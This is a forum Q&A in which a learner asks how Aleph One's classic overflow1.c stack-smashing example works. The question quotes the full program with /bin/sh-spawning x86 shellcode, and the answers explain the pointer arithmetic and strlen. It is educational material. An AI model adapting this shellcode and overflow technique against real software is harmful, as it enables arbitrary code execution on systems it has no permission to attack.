# Understanding Aleph One's first buffer overflow exploit

Tags: c, assembly, stack-overflow

I am reading "Smashing The Stack For Fun And Profit" by Aleph one, and reached this spot:

```
overflow1.c
------------------------------------------------------------------------------
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char large_string[128];

void main() {
  char buffer[96];
  int i;
  long *long_ptr = (long *) large_string;

  for (i = 0; i < 32; i++)
    *(long_ptr + i) = (int) buffer;

  for (i = 0; i < strlen(shellcode); i++)
    large_string[i] = shellcode[i];

  strcpy(buffer,large_string);
}
```

Now, I understand all the theory behind the exploit:
the `shellcode[]` is in the data segment (which is writable), and contains the code to spawn a shell.

We would like to copy its content to main's buffer, in addition to overwrite main's return address to the beginning of the buffer (so that the execution control will be of our "spawning a shell" code. We do it by coping the `shellcode` to the `large_string[]` buffer (second for-loop), and the rest(???) of `large_sting[]` will contain the buffer's address (first for-loop).

Of course, main's return address will be overwritten by this buffer's address, since we copy `large_string[]` to `buffer[]` (`strcpy`).

**My problem is with the little details of the exploit:**

---

1.)

Why does the first for-loop is from `i=0` to `i=31`? I mean, considering the pointer arithmetic, how does it work? [`large_string[]` is only 128 bytes]

2.)

What is `srlen(shellcode)`?

---

I would some clearing on that kind of stuff.

Thanks!

Answer (score 1):

> 1) Why does the first for-loop is from i=0 to i=31? I mean, considering the pointer arithmetic, how does it work? [large_string[] is only 128 bytes]

It copies four bytes at a time (it relies on knowing that `sizeof(int)` is `4` on the target platform), and `32 * 4 == 128`.

> 2) What is srlen(shellcode)?

It's the number of bytes in `shellcode` (this relies on the fact that `shellcode` does not contain embedded `\0` characters).

Comment: For reference, the article assumes the platform is "Intel x86" on Linux.

Comment: Thx, but I'm still a bit confused why you wrote "sizeof(int)". You see that long_ptr is pointer to long, and large_string is an array of char...

Comment: It's sizeof(long) that really matters, but int and long are the same size on 32-bit Linux.